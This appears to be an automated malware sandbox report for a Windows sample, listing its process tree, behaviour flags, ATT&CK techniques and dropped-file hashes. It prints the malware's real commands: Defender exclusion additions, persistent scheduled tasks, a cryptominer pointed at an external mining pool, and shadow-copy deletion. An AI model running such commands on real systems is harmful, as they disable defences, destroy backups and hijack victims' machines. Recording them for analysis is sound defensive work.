C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\backgroundTaskHost.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\spoolsv.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3104 -
C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe"2⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'3⤵PID:4956
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\System.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3336 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\winlogon.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\dllhost.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4080 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4868 -
C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe"C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe"3⤵
- UAC bypass
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3116 -
C:\Users\Admin\AppData\Local\Temp\m.exe"C:\Users\Admin\AppData\Local\Temp\m.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZEGCIBQVA" /tr "C:\ProgramData\battlenet\ZEGCIBQVA.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:6136 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "ZEGCIBQVA" /tr "C:\ProgramData\battlenet\ZEGCIBQVA.exe"6⤵
- Creates scheduled task(s)
PID:4040 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RFLLB2JSF2jF32LXcusk7Mo9bvC7o8WbPt.work -p x -t 105⤵PID:3752
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls6⤵PID:1676
-
C:\Users\Admin\AppData\Local\Temp\h.exe"C:\Users\Admin\AppData\Local\Temp\h.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3932 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"5⤵
- Modifies extensions of user files
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet6⤵PID:4956
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet7⤵
- Interacts with shadow copies
PID:5348 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet6⤵
- Suspicious use of WriteProcessMemory
PID:5740 -
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet7⤵
- Interacts with shadow copies
PID:5800 -
C:\Users\Admin\AppData\Local\Temp\mm.exe"C:\Users\Admin\AppData\Local\Temp\mm.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5260 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5380
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:220
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1752
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Music\backgroundTaskHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3240
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Public\Music\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Music\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2748
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4672
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3888
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4760
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Security\System.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:540
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Security\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Security\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1300
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\winlogon.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4932
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4948
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\CbsTemp\dllhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5108
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\CbsTemp\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Windows\CbsTemp\dllhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1584
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2084
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Internet Explorer\images\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3696
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5508
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Bypass User Account Control
1Disabling Security Tools
1File Deletion
2Modify Registry
2Scripting
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exeFilesize
2.3MB
MD5ec50388a69792d133c1298e1dceb40a6
SHA180ff3e79bc0679a0e2e91e811310e9fe59c5fcdb
SHA256bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0
SHA512fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59
-
C:\Program Files (x86)\Windows Defender\fr-FR\fontdrvhost.exeFilesize
2.3MB
MD5ec50388a69792d133c1298e1dceb40a6
SHA180ff3e79bc0679a0e2e91e811310e9fe59c5fcdb
SHA256bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0
SHA512fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59
-
C:\Recovery\WindowsRE\RCX9F97.tmpFilesize
2.3MB
MD58058f8123153d8ec14b8e46d48dea44e
SHA117f18234fdd7defc8cbbd01533a2f1a094fb4f5d
SHA256e1f31b94a4e6d8293b7fb5c7a31e05462150b079dbe42079ca5d22bb9b6fab59
SHA512e456e9603dbe717f6b743bb0c4634ded1bdcf87df7b16a0287bafb2d18d95aed73353d561cd7b04a045a70975a76ba62df0a0f6ee755adb033f0de7978c52e64
-
C:\Recovery\WindowsRE\backgroundTaskHost.exeFilesize
2.3MB
MD5ec50388a69792d133c1298e1dceb40a6
SHA180ff3e79bc0679a0e2e91e811310e9fe59c5fcdb
SHA256bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0
SHA512fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59
-
C:\Recovery\WindowsRE\eddb19405b7ce1Filesize
1KB
MD5ffcedf515e531d74f5799d21741f5d07
SHA1cdd349adfa3a4644d86a4a1052a6d7c9e918f55c
SHA256c05e7534f76a611dfbf29dd8fff40a65264812bda8630b1290090846baa90651
SHA512a02dbf221e073db6ff14ed8f88293939500495a55d49b9bbd041e1dbef6d6aa2c12510f922e1ee0faa0b5f96816cd52d56f0840a19aa71b5b87098c96a1fe10d
-
C:\Recovery\WindowsRE\f3b6ecef712a24Filesize
748B
MD518e3300114651ae5830d46a77b59f095
SHA1a9b55afd5d24a503f7c385a6ea55a15704862e36
SHA2562cfa5da54fbf5837fbb25bc002b338a302f13b70d6fb9f73ac48444d42ce3da9
SHA5129775f4838027604de1b32381d16552a5e9b3cbef054e15529af2833a238e84ccac7cbcfa940a399cfb0b7fe8a0d70f89049645d640c8df90446b2b8eddf929d1
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ec50388a69792d133c1298e1dceb40a6.exe.logFilesize
1KB
MD5e1b159e530af554c42b6b6f3aefbd4de
SHA1281d3767129c8aa8fc8867515578dee1eb7f39ba
SHA25694b7640dce6d228f0d89f1d504c7143397ffa2af6adf910b501d9d51583f463e
SHA512f373930c1dfab5e3029af93880c2f3bfc16413aaa28a563d4b953f93066facfe1ee1213e5facb6b92df79b2b3d2a2866df7c15fa2d6fe0a359186688aa7e99f0
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD53d086a433708053f9bf9523e1d87a4e8
SHA1b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA2566f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD55a39d91e076fe4593c08a47f56e52460
SHA1ef1617b70640079e9988e81477b6b9e01711b4dc
SHA2561440fbb80eba269dea076aa965211bfefe5186a66696443386d7981a4d7bf183
SHA512af48ad99dcfda6f503ef610677a7bd0a3c1f5741102c436f06ebd30269e2f916e18bd44653b120adc81fe3673da108d56c6340ca29fb5f1feafc9e8b89efc211
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD55a39d91e076fe4593c08a47f56e52460
SHA1ef1617b70640079e9988e81477b6b9e01711b4dc
SHA2561440fbb80eba269dea076aa965211bfefe5186a66696443386d7981a4d7bf183
SHA512af48ad99dcfda6f503ef610677a7bd0a3c1f5741102c436f06ebd30269e2f916e18bd44653b120adc81fe3673da108d56c6340ca29fb5f1feafc9e8b89efc211
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD55a39d91e076fe4593c08a47f56e52460
SHA1ef1617b70640079e9988e81477b6b9e01711b4dc
SHA2561440fbb80eba269dea076aa965211bfefe5186a66696443386d7981a4d7bf183
SHA512af48ad99dcfda6f503ef610677a7bd0a3c1f5741102c436f06ebd30269e2f916e18bd44653b120adc81fe3673da108d56c6340ca29fb5f1feafc9e8b89efc211
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD55a39d91e076fe4593c08a47f56e52460
SHA1ef1617b70640079e9988e81477b6b9e01711b4dc
SHA2561440fbb80eba269dea076aa965211bfefe5186a66696443386d7981a4d7bf183
SHA512af48ad99dcfda6f503ef610677a7bd0a3c1f5741102c436f06ebd30269e2f916e18bd44653b120adc81fe3673da108d56c6340ca29fb5f1feafc9e8b89efc211
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD541e904e39f05513fbea3f2cc85f6bb80
SHA143a088c467f6a72a3a342f9f4d5d5a6df31e03d5
SHA256277bd2da142f7d10c5c44d4c788f9ecdc9ca12481e4d0984ba7fb3895faf4a80
SHA512ae866df670c7c5b6a2ce8e71aaf926b2a0e29450902285839f6161b7440b920401608d6087c6974ff7394dd135df65c4d5b908c0798a6caf954277b368c30287
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD52802c3222bfdefd47336d3cdc87791d9
SHA1e87893c5e06b9abec3f77f20b7d3f2dc8eac2ccc
SHA2567706f631c7b9f827a3dc15e578fc5c0030df9248a93efa4b428853b3081c5c7d
SHA51251ce77cc1449fab6e857014fc5fec8331c18bc54f1f6c9eb1a6a88bbd259250d93204da05a750b15c27700ce88d134a85f5a01318e87111cde0aa09aea69c742
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5fdd2b2888041dfa29fc0f255221f9144
SHA1f62a63011217f85374ebc36cd53536b18fc5093a
SHA2567ecaa84b2e455a4ac23d28068298a833bf1195e6333c39241109f9caa3aebf32
SHA5123d6cd87edf42f26e281db89ab74681ec2c4d415f00d466f1e3f7249658c6d3767700871ab2db746ba146e1b274587428203294081adc3a60fa94b1b81ec0c1d3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5fdd2b2888041dfa29fc0f255221f9144
SHA1f62a63011217f85374ebc36cd53536b18fc5093a
SHA2567ecaa84b2e455a4ac23d28068298a833bf1195e6333c39241109f9caa3aebf32
SHA5123d6cd87edf42f26e281db89ab74681ec2c4d415f00d466f1e3f7249658c6d3767700871ab2db746ba146e1b274587428203294081adc3a60fa94b1b81ec0c1d3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
18KB
MD5fdd2b2888041dfa29fc0f255221f9144
SHA1f62a63011217f85374ebc36cd53536b18fc5093a
SHA2567ecaa84b2e455a4ac23d28068298a833bf1195e6333c39241109f9caa3aebf32
SHA5123d6cd87edf42f26e281db89ab74681ec2c4d415f00d466f1e3f7249658c6d3767700871ab2db746ba146e1b274587428203294081adc3a60fa94b1b81ec0c1d3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD59b80cd7a712469a4c45fec564313d9eb
SHA16125c01bc10d204ca36ad1110afe714678655f2d
SHA2565a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584
-
C:\Users\Admin\AppData\Local\Temp\ElJlpTTjQFFilesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
C:\Users\Admin\AppData\Local\Temp\Km2JpwhXKYFilesize
112KB
MD5780853cddeaee8de70f28a4b255a600b
SHA1ad7a5da33f7ad12946153c497e990720b09005ed
SHA2561055ff62de3dea7645c732583242adf4164bdcfb9dd37d9b35bbb9510d59b0a3
SHA512e422863112084bb8d11c682482e780cd63c2f20c8e3a93ed3b9efd1b04d53eb5d3c8081851ca89b74d66f3d9ab48eb5f6c74550484f46e7c6e460a8250c9b1d8
-
C:\Users\Admin\AppData\Local\Temp\O7vGYvM0zPFilesize
92KB
MD5721d9e468a6d6d0276d8d0e060e4e57b
SHA162c635bf0c173012301f195a7d0e430270715613
SHA2560be20bbaa9d80dfefd3038e5c7904d4b426719607c563254ec42500d704021f0
SHA5120af08f0f5ecda8cdaaaba317f16e835032797e4e6e64f3f4e5b0bb8fd20f1afd9e8e2ca50b549e1c1a48a26ff02f59bc8212deb354b095294c97016a3c9dbb12
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bfshjvnb.0eh.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\ec50388a69792d133c1298e1dceb40a6.exeFilesize
2.3MB
MD5ec50388a69792d133c1298e1dceb40a6
SHA180ff3e79bc0679a0e2e91e811310e9fe59c5fcdb
SHA256bdc2f986320facc24627b6e31ae3ff0147583b04c262a386b2043557b59d06c0
SHA512fc1141659419b03040ce5bfb3b98c53f2ed53c49e285a68e341620c569f1aa6beb0cb17559e331af6f25a805ae70070a90787e26c4ee5474985c1cb52d04ab59
-
C:\Users\Admin\AppData\Local\Temp\h.exeFilesize
193KB
MD5eff03153e4a2444ee03ca0f283156102
SHA14409d4d91bba5a24f2aeff1d00ccf77aa64d2157
SHA2568deb203aaf30f729274bf31408ee7606631686a056b2fd815f5cd219586f8f7e
SHA512caaf9cc47ddba3560230cb01a3b4914c42c4decb04ecb5ab1518d62f41530923625226decc2615815969ac6551ec28aced8b86d8c2735666cef4682ee85cb2f9
-
C:\Users\Admin\AppData\Local\Temp\h.exeFilesize
193KB
MD5eff03153e4a2444ee03ca0f283156102
SHA14409d4d91bba5a24f2aeff1d00ccf77aa64d2157
SHA2568deb203aaf30f729274bf31408ee7606631686a056b2fd815f5cd219586f8f7e
SHA512caaf9cc47ddba3560230cb01a3b4914c42c4decb04ecb5ab1518d62f41530923625226decc2615815969ac6551ec28aced8b86d8c2735666cef4682ee85cb2f9
-
C:\Users\Admin\AppData\Local\Temp\h.exeFilesize
193KB
MD5eff03153e4a2444ee03ca0f283156102
SHA14409d4d91bba5a24f2aeff1d00ccf77aa64d2157
SHA2568deb203aaf30f729274bf31408ee7606631686a056b2fd815f5cd219586f8f7e
SHA512caaf9cc47ddba3560230cb01a3b4914c42c4decb04ecb5ab1518d62f41530923625226decc2615815969ac6551ec28aced8b86d8c2735666cef4682ee85cb2f9
-
C:\Users\Admin\AppData\Local\Temp\k5od7j47kPFilesize
20KB
MD5c9ff7748d8fcef4cf84a5501e996a641
SHA102867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA2564d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73
-
C:\Users\Admin\AppData\Local\Temp\m.exeFilesize
898KB
MD5b6528ddfaa0755893d7b3b701ee6c004
SHA1ccf0216ca6a658c46c16400cbed9293065525ef0
SHA2561dc6dbd75812f620245d8b426786e5dd469218d3ce24588924fe1e5f7d41657c
SHA512012a521d84961c457bd22efaf859a5786f887a56abe470e25b3942130bf96a9bdb63cd2d871a459cccfebd9b523718f4c8add9c9003be683dad16f4f4efed035
-
C:\Users\Admin\AppData\Local\Temp\m.exeFilesize
898KB
MD5b6528ddfaa0755893d7b3b701ee6c004
SHA1ccf0216ca6a658c46c16400cbed9293065525ef0
SHA2561dc6dbd75812f620245d8b426786e5dd469218d3ce24588924fe1e5f7d41657c
SHA512012a521d84961c457bd22efaf859a5786f887a56abe470e25b3942130bf96a9bdb63cd2d871a459cccfebd9b523718f4c8add9c9003be683dad16f4f4efed035
-
C:\Users\Admin\AppData\Local\Temp\m.exeFilesize
898KB
MD5b6528ddfaa0755893d7b3b701ee6c004
SHA1ccf0216ca6a658c46c16400cbed9293065525ef0
SHA2561dc6dbd75812f620245d8b426786e5dd469218d3ce24588924fe1e5f7d41657c
SHA512012a521d84961c457bd22efaf859a5786f887a56abe470e25b3942130bf96a9bdb63cd2d871a459cccfebd9b523718f4c8add9c9003be683dad16f4f4efed035
-
C:\Users\Admin\AppData\Local\Temp\mm.exeFilesize
897KB
MD578029b39d00f6b56e28b23d5a87c7105
SHA13aae15ba1f05a0942ad3036b5272d6dd9d459886
SHA256c5dd221d14f063b4c3d59e80660af8eac1422d9d4e687c1fd7f70323a38a6456
SHA512b165743e3428e9d78c99965bb4eaad507807c3cc37f267a3acdc4e32afbf6e24811b57e371711f7cd06af26ab6be6e388eeaa84b8eaff714e15964a719222a93
-
C:\Users\Admin\AppData\Local\Temp\mm.exeFilesize
897KB
MD578029b39d00f6b56e28b23d5a87c7105
SHA13aae15ba1f05a0942ad3036b5272d6dd9d459886
SHA256c5dd221d14f063b4c3d59e80660af8eac1422d9d4e687c1fd7f70323a38a6456
SHA512b165743e3428e9d78c99965bb4eaad507807c3cc37f267a3acdc4e32afbf6e24811b57e371711f7cd06af26ab6be6e388eeaa84b8eaff714e15964a719222a93
-
C:\Users\Admin\AppData\Local\Temp\mm.exeFilesize
897KB
MD578029b39d00f6b56e28b23d5a87c7105
SHA13aae15ba1f05a0942ad3036b5272d6dd9d459886
SHA256c5dd221d14f063b4c3d59e80660af8eac1422d9d4e687c1fd7f70323a38a6456
SHA512b165743e3428e9d78c99965bb4eaad507807c3cc37f267a3acdc4e32afbf6e24811b57e371711f7cd06af26ab6be6e388eeaa84b8eaff714e15964a719222a93
-
C:\Users\Default\cc11b995f2a76dFilesize
384B
MD551453654d80c3f42a158c86bd53e44d8
SHA1f9e2cea084760d87a6d48c8030ff21e3bb18d833
SHA256d30a365762e45777524278e7bd94e19dfab49d91681d0c5f4597ba95122e0421
SHA51238082e2adaa0b276bab78de8f246b0065aeee1630ac574a498fb14ada450b20000d0778e32e3b820da8a0b0516a24eaf9b49e645b272bc227c679ae8c67a1eba
-
C:\Users\Public\Music\eddb19405b7ce1Filesize
943B
MD591a6496b43d11920a6188a33fc2b3f39
SHA10bee0d773403b7ec67e5eaec74670ed459dcf81b
SHA25644c75662ea6bde6ba813b381c31a9e7f477036d7ee2f0a08b932bc9cf30d1bd1
